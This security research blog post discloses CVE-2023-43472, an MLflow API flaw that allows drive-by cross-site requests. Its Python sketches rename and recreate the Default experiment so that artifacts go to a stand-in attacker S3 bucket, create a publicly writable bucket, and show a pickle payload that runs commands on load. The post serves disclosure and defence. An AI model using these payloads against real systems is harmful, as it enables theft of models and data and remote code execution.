
Contrast discovers MLflow framework zero-day that threatens to poison machine learning models

Most machine learning (ML) tools — including the development frameworks used for managing ML life cycles — are relatively new, which means they could well have security vulnerabilities.

After finding two Common Vulnerabilities and Exposures (CVEs) in the Togglz web console (the cross-site scripting [XSS] CVE-2020-28192 and the cross-site request forgery [CSRF] CVE-2020-28191), I decided to check out MLflow, a development framework for ML life cycle management, thinking that it could potentially be vulnerable.

It was. Specifically, I found a misconfigured application programming interface (API) that fails to check the content-type header. This means that an attacker can make a simple request to localhost without triggering a preflight — i.e., an HTTP request of the OPTIONS method that the browser sends before the actual request in order to determine whether it is allowed. I found that this could be done in MLflow by using a text/plain content type instead of the correct application/json (JavaScript Object Notation) content type.

An existential threat to companies being built around ML 

The result is an extremely dangerous vulnerability that threatens ML models: A successful attack can lead to the leaking of both an ML model and all of its training data to an attacker. This is an existential threat to companies being built around an ML model. Given a successful exploit of this vulnerability, an attacker could gain access and control equivalent to gaining write access to the source code of a company that writes software.

I reported this CVE — designated CVE-2023-43472 — on Sept. 5, 2023 and directly emailed Databricks, the original creator and current maintainer of MLflow. I informed Databricks that I would be giving a talk describing the issue at the DefCamp security conference on Friday, Nov. 24. As of Nov. 29, Databricks reported that it was working on a fix that was scheduled to be released later this week.

This CVE impacts all versions of MLflow from at least 2.6.0, and most likely all 2.x versions. 

I'm not sure exactly how widely used MLflow is, but based on the number of stars it’s garnered on GitHub, it’s more popular than the Kubernetes-based Kubeflow: 15.9K stars for MLflow, vs. 13.2K for Kubeflow. For what it’s worth, when Canonical recently announced its Charmed MLflow MLOps platform, Canonical Vice President of Product Management Cédric Gégout called MLflow “the leading AI framework for streamlining all ML stages.”

The vulnerability

The MLflow user interface (http://localhost:5000/) contains a REST API. Normally, this wouldn't be vulnerable to simple-request attacks, as the POST requests use a content type of application/json, which would trigger a preflight request.

But in this case, the API doesn't check the content-type header. Therefore, it’s possible to send the request with a content type of text/plain, which browsers treat as a simple request and therefore do not preflight.

While the request body is valid JSON, the content-type is set to text/plain. The API should reject this request, given that it’s of an unexpected type, but the API apparently doesn’t check the content type.
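As a rough illustration (not the exact request from the original testing), the following Python sketch uses the requests library against a default local MLflow tracking server and the standard experiments/search REST endpoint; on vulnerable versions the API processes the JSON body even though it is delivered as text/plain. In the real attack, the equivalent request would be issued from JavaScript in the victim's browser, where the text/plain content type is what avoids the CORS preflight.

```python
# Minimal sketch: show that the tracking server accepts a JSON body delivered
# with a text/plain content type. Assumes an MLflow server on localhost:5000;
# the endpoint path comes from the standard MLflow REST API.
import requests

resp = requests.post(
    "http://localhost:5000/api/2.0/mlflow/experiments/search",
    data='{"max_results": 10}',               # valid JSON in the body...
    headers={"Content-Type": "text/plain"},   # ...but a "simple" content type
)

# On vulnerable versions the API parses the body and answers normally,
# rather than rejecting the unexpected content type.
print(resp.status_code)
print(resp.json())
```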

Using that, if you can get the MLflow user to visit a website for which you control the JavaScript — say, by creating an MLflow tutorial website — you can effectively modify the Default experiment and set the artifact location to a globally writable S3 bucket that you control. An adversary can then read any data uploaded to that bucket.

Unfortunately, the API is lacking some functionality. You can neither modify an existing experiment's artifact_uri via the API nor delete the Default experiment. But you can create new experiments and rename existing ones, so a new experiment can be named “Default.”

The attack does the following (a rough sketch of the corresponding REST calls appears after the list):

  • Modify the Default experiment name to "Old."

  • Create a new experiment named "Default" with an artifact_uri pointing to an S3 bucket the attacker controls.

  • Once a new MLflow run is done — e.g., mlflow run sklearn_elasticnet_wine -P alpha=0.5 --experiment-name Default — the result of the run will be uploaded to the S3 bucket.
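The browser payload itself is JavaScript, but the two API calls behind the steps above can be sketched in Python as follows. The endpoint paths and fields come from the standard MLflow REST API (experiments/update and experiments/create, with the Default experiment normally having ID 0); the bucket name is a hypothetical placeholder.

```python
# Sketch of the two API calls behind the attack, assuming an MLflow tracking
# server on localhost:5000 and a hypothetical attacker-controlled bucket.
# (In the real attack these are sent as non-preflighted text/plain requests
# from JavaScript running in the victim's browser.)
import requests

BASE = "http://localhost:5000/api/2.0/mlflow"
HEADERS = {"Content-Type": "text/plain"}  # avoids a CORS preflight in a browser

# 1. Rename the existing Default experiment (ID 0 on a fresh server) to "Old".
requests.post(
    f"{BASE}/experiments/update",
    data='{"experiment_id": "0", "new_name": "Old"}',
    headers=HEADERS,
)

# 2. Create a new experiment named "Default" whose artifacts are written to
#    the attacker's globally writable S3 bucket.
requests.post(
    f"{BASE}/experiments/create",
    data='{"name": "Default", "artifact_location": "s3://attacker-bucket/"}',
    headers=HEADERS,
)
```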

The payload is available here

Impact

This vulnerability allows an attacker to exfiltrate a serialized version of the ML model and the data used to train the model, if the attacker is able to get the MLflow user to access a website they control.

Attacking a developer environment via drive-by localhost attacks

To put this vulnerability into context, there’s a widespread belief that services that are only bound to localhost are not accessible from the outside world. Unfortunately, this is not always the case. Developers, for the sake of convenience, often configure the services they are developing less securely than they would (hopefully!) configure them in higher-security environments.

By compromising websites used by developers — simply by injecting JavaScript into advertisements served on those sites, or by serving up a phishing attack that gets the developer to open a web browser on a compromised page — it is possible to reach services bound to localhost via non-preflighted HTTP requests, either by exploiting common misconfigurations in the Spring application framework or via known vulnerabilities, including the recently disclosed CVE I found in the popular Quarkus Java framework.

As I demonstrated during Friday’s DefCamp talk, it is possible to achieve remote code execution (RCE) on the developer’s machine or on other services on their private network. Given that developers have write access to codebases, AWS keys, server credentials, etc., access to the developer’s machine gives an attacker a great deal of scope to pivot to other resources on the network, as well as to modify or entirely steal the codebase.

Easy to exploit

CVE-2023-43472 would be relatively simple to exploit: an attacker merely has to get a target to visit a website that they control. At that point, the attacker can silently change the location the data is saved to, pointing it at an S3 bucket under their control.

An exploit could be used to send data to a globally writable S3 bucket, from which it can be exfiltrated. 

Amazon S3 buckets are used to store all sorts of data: they’re just a way to store data programmatically in the cloud. There are no AWS security guardrails that could limit the extent of damage somebody could do in an exploit, given that the S3 bucket is created and owned by the attacker. 
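For illustration only: a “globally writable” bucket is simply one whose policy grants anonymous s3:PutObject. A minimal boto3 sketch of that setup might look like the following; the bucket name is hypothetical, and newer AWS accounts would also need the default public-access block relaxed before such a policy takes effect.

```python
# Rough sketch of the attacker-side setup: an S3 bucket whose policy allows
# anyone to upload objects. The bucket name is hypothetical, and region
# configuration / public-access-block handling is omitted for brevity.
import json
import boto3

s3 = boto3.client("s3")
bucket = "attacker-bucket"  # hypothetical name

s3.create_bucket(Bucket=bucket)
s3.put_bucket_policy(
    Bucket=bucket,
    Policy=json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:PutObject",
            "Resource": f"arn:aws:s3:::{bucket}/*",
        }],
    }),
)
```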

How this could affect ML models

A successful exploit could lead to more than data exfiltration. Given that an ML model is stored in the bucket, there would be potential to poison the ML model itself. In such an attack, an adversary is able to inject bad data into the model’s training pool, causing it to learn something it shouldn’t. 

If/when the model is read by the victim, there’s also the potential for a modified model.pkl file to contain a Python pickle exploit, which can lead to RCE on the victim’s machine.
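To show why loading an untrusted model.pkl is dangerous, here is the textbook pickle behavior being referred to: a pickled object's __reduce__ method can instruct pickle to call an arbitrary function during deserialization. A benign echo command stands in for real attacker code.

```python
# Textbook illustration of why unpickling untrusted data is dangerous:
# __reduce__ lets a pickled object specify a callable (and its arguments)
# that pickle will invoke when the data is loaded.
import os
import pickle


class Malicious:
    def __reduce__(self):
        # A benign command stands in for attacker-controlled code.
        return (os.system, ("echo pickle payload executed",))


payload = pickle.dumps(Malicious())

# A victim loading a tampered model.pkl is effectively doing this:
pickle.loads(payload)  # runs the command above during deserialization
```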

What to do

MLflow users should upgrade to the new version as soon as it's available.



Joseph Beeton, Senior Application Security Researcher, Contrast Security


Joseph Beeton is a Senior Security Researcher for Contrast Security and a recovering Java Developer. He started his career as a Java developer writing archive/backup software before moving to a large financial company working on web applications and backend APIs. However, after a while, writing yet another microservice isn't that much fun anymore. Breaking them was, though. Thus, he moved to Application Security and from there on to Research.